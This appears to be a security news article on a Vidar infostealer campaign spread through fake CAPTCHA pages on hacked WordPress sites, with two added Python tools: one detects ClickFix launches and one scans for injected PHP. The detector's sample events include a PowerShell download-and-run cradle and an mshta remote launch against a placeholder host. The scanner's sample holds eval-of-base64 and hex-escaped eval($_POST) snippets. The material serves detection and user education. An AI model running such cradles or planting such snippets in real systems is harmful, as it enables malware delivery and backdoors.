PROBABLYPWNED
Malware · March 28, 2026 · 4 min read

Vidar Infostealer Spreads via Hacked WordPress Sites

Malwarebytes researchers detected a Vidar infostealer campaign using fake CAPTCHA pages on compromised WordPress sites. The ClickFix technique tricks users into running a malicious PowerShell command themselves.

James Rivera

Malwarebytes researchers have detected an active campaign delivering Vidar infostealer through compromised WordPress websites hosting fake CAPTCHA verification pages. The attack chain, leveraging the ClickFix social engineering technique, has been observed targeting users across Italy, France, the United States, the United Kingdom, and Brazil.

Vidar remains one of the most prevalent infostealers in 2026, consistently ranking among the top four active families alongside LummaC2, ACRStealer, and StealC according to threat tracking data.

How the Attack Works

The infection chain begins when victims visit legitimate but compromised WordPress sites. Attackers inject malicious code that redirects visitors to pages displaying a fake "verify you are human" CAPTCHA prompt. This technique has become increasingly common in malware distribution, exploiting users' familiarity with CAPTCHAs on legitimate websites.

When users attempt to complete the verification, the page instructs them to open the Run dialog (Windows+R), paste with Ctrl+V, and press Enter. The page's own script has already copied the attacker's command to the clipboard, so what the user pastes is a PowerShell one-liner that downloads and runs the Vidar payload.

This ClickFix approach sidesteps controls built around automated delivery: nothing exploits the browser, no file is downloaded for the user to open, and the user launches the command from the Run dialog, so it runs as a child of explorer.exe and looks like ordinary interactive use. Endpoint rules keyed on a browser or Office application spawning PowerShell will not fire on it. The useful signal is explorer.exe launching powershell.exe or mshta.exe with a hidden window and a download cradle in the command line, which is rare in normal user activity.
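The detection logic described above, as an added example that is not code from the article or from Malwarebytes. It triages process-creation telemetry shaped like Sysmon Event ID 1 (ParentImage, Image, CommandLine) and raises an alert only when a user-launched interpreter (explorer.exe as parent) is running a download cradle or hidden-window flag; the sample events, paths and command lines are constructed for illustration, and example.invalid is a reserved name, not a real indicator.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example, not code from the article or from Malwarebytes. The events
below are constructed in the shape of Sysmon Event ID 1 fields (ParentImage,
Image, CommandLine); field names, paths and command lines are assumptions
made for illustration only.
"""
import re

# Interpreters a command pasted into the Run dialog usually lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# The Run dialog (and the Start menu search box) hand the typed command line
# to explorer.exe to spawn, so explorer.exe as parent means "a person ran this".
USER_LAUNCHERS = {"explorer.exe"}

# Download cradles and obfuscation flags commonly seen in pasted commands.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b"
    r"|invoke-restmethod|\birm\b|frombase64string"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"   # -enc <base64 payload>
    r"|\bmshta(?:\.exe)?\s+https?://"                   # mshta pulling a remote HTA
    r"|-w(?:indowstyle)?\s+hidden",                     # hide the console window
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def cradle_hits(cmdline: str) -> list[str]:
    """Distinct cradle/obfuscation tokens found in a command line, sorted."""
    return sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmdline)})


def classify(event: dict) -> str:
    """'alert' for a user-launched interpreter running a download cradle,
    'review' for a cradle under any other parent, 'benign' otherwise."""
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return "benign"
    if not cradle_hits(event.get("CommandLine", "")):
        return "benign"   # interactive shells and plain -File runs stay quiet
    if basename(event.get("ParentImage", "")) in USER_LAUNCHERS:
        return "alert"
    return "review"


def triage(events: list[dict]) -> list[dict]:
    """Return every non-benign event with its verdict and the matched tokens."""
    out = []
    for ev in events:
        verdict = classify(ev)
        if verdict != "benign":
            out.append({"verdict": verdict,
                        "hits": cradle_hits(ev["CommandLine"]),
                        "event": ev})
    return out


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {   # 1: a ClickFix paste - hidden window, iex of a remote script, explorer parent
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/verify.txt').Content\"",
    },
    {   # 2: an admin opening an interactive shell from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # 3: a scheduled task running a local script
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # 4: the mshta variant of the same lure
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/verify",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["verdict"].upper(), finding["event"]["CommandLine"], finding["hits"])
```

Events 1 and 4 alert, event 2 (an interactive shell) and event 3 (a local script under a task host) do not; a cradle under any other parent is returned as "review" so a scheduled task that starts pulling remote code still gets looked at.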

What Vidar Steals

Once installed, Vidar targets a broad range of sensitive data:

  • Browser credentials and cookies from Chrome, Firefox, Edge, and other browsers
  • Cryptocurrency wallet data and seed phrases
  • Two-factor authentication app data
  • FTP and email client credentials
  • Screenshots of the victim's desktop
  • System information for fingerprinting

The stolen data is exfiltrated to attacker-controlled infrastructure before the malware cleans traces of its presence. Vidar's modular design allows operators to customize which data types they prioritize based on their monetization goals.

WordPress Sites as Attack Infrastructure

The campaign illustrates how attackers weaponize legitimate web infrastructure to distribute malware. WordPress sites are frequently targeted due to the platform's ubiquity and the variable security posture of self-hosted installations. Outdated plugins, weak admin credentials, and misconfigured permissions create opportunities for mass compromise.

Website owners often remain unaware their sites are hosting malicious content until notified by security researchers or hosting providers. The Torg Grabber infostealer campaign we covered recently used similar ClickFix techniques, demonstrating how effective this social engineering approach has become.

Protection Recommendations

For end users:

  1. Be skeptical of any website asking you to paste commands into a Run dialog or terminal
  2. Legitimate CAPTCHA services never require running system commands
  3. Keep browsers and operating systems updated with latest security patches
  4. Use a password manager rather than the browser's built-in credential store, which is the store Vidar harvests, and change any passwords that were saved in a browser on a machine that ran the pasted command

For WordPress administrators:

  1. Update WordPress core, themes, and plugins immediately when patches release
  2. Use strong, unique passwords for admin accounts and enable two-factor authentication
  3. Implement a web application firewall to block common attack patterns
  4. Regularly scan theme and plugin files for injected code, and verify core and plugin files against their published checksums (WP-CLI's verify-checksums commands do this)
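A starting point for the file scan in the last recommendation, as an added example that is not code from the article, from Malwarebytes or from the WordPress project. It walks a wp-content tree and reports generic injection indicators (eval of a decoded blob, hex-escaped source, long base64 strings, hidden iframes, remote script tags); the two PHP samples are constructed, not taken from any real site. These are heuristics for human review, not proof of compromise, and a file scan does not see injections stored in the database (wp_options, wp_posts), which need a separate check.

```python
"""Heuristic scan of WordPress theme and plugin files for injected code.

Added example, not code from the article, Malwarebytes or WordPress. The
indicators are generic patterns seen in injected PHP/JS; treat hits as
leads for review, not as proof of compromise.
"""
import os
import re

# (indicator name, pattern, severity)
INDICATORS = [
    ("eval-of-decoded-blob",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
     "high"),
    ("hex-escaped-string", re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I), "high"),
    ("hidden-iframe",
     re.compile(r"<iframe[^>]*(?:display\s*:\s*none|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)", re.I),
     "medium"),
    ("long-base64-blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), "medium"),
    ("variable-function-call", re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$"), "low"),
    ("remote-script-tag", re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']https?://", re.I), "low"),
]

SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")


def scan_text(text: str, path: str) -> list[dict]:
    """Return one finding per indicator match, ordered by line number."""
    findings = []
    for name, pattern, severity in INDICATORS:
        for m in pattern.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append({"path": path, "line": line, "indicator": name,
                             "severity": severity, "snippet": m.group(0)[:60]})
    findings.sort(key=lambda f: (f["line"], f["indicator"]))
    return findings


def scan_tree(root: str, min_severity: str = "low") -> list[dict]:
    """Walk a wp-content directory and collect findings at or above a severity."""
    rank = {"low": 0, "medium": 1, "high": 2}
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            results.extend(f for f in scan_text(text, path)
                           if rank[f["severity"]] >= rank[min_severity])
    return results


# Constructed samples (not from any real site).
CLEAN_SAMPLE = (
    "<?php\n"
    "function theme_assets() {\n"
    "    wp_enqueue_style('theme', get_stylesheet_uri());\n"
    "}\n"
    "add_action('wp_enqueue_scripts', 'theme_assets');\n"
)

INJECTED_SAMPLE = (
    "<?php\n"
    "add_action('wp_enqueue_scripts', 'theme_assets');\n"
    "$x = \"" + "QUJD" * 60 + "\";\n"            # line 3: a 240-char base64 blob
    "eval(base64_decode($x));\n"                  # line 4: runs whatever the blob decodes to
    "echo \"\\x65\\x76\\x61\\x6c\\x28\\x24\\x5f\\x50\\x4f\\x53\\x54\\x29\";\n"  # line 5: hex-escaped source
)

if __name__ == "__main__":
    for f in scan_text(INJECTED_SAMPLE, "wp-content/themes/example/functions.php"):
        print(f"{f['severity']:6} {f['path']}:{f['line']} {f['indicator']}: {f['snippet']}")
```

Run scan_tree("wp-content", "medium") from the site root to get the medium and high findings only; the low-severity indicators (variable function calls, remote script tags) are common in legitimate plugins and are best compared against a known-clean copy of the same plugin version.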

Organizations should review our malware defense guide for comprehensive protection strategies against infostealers and other malicious software.

Why This Matters

The ClickFix technique represents an evolution in social engineering that shifts the execution burden to the victim. Traditional drive-by downloads relied on browser vulnerabilities that have become harder to exploit as browser security improved. By convincing users to execute commands themselves, attackers bypass these protections entirely.

Similar to the PureLog stealer campaign targeting German healthcare organizations, Vidar operators demonstrate sophisticated understanding of how to reach victims where they feel safe. The presence of fake CAPTCHA pages on otherwise legitimate websites exploits the trust users place in familiar domains.

Security teams should alert end users about this attack pattern. The unusual request to paste commands should be a red flag, but many users comply without recognizing the danger.
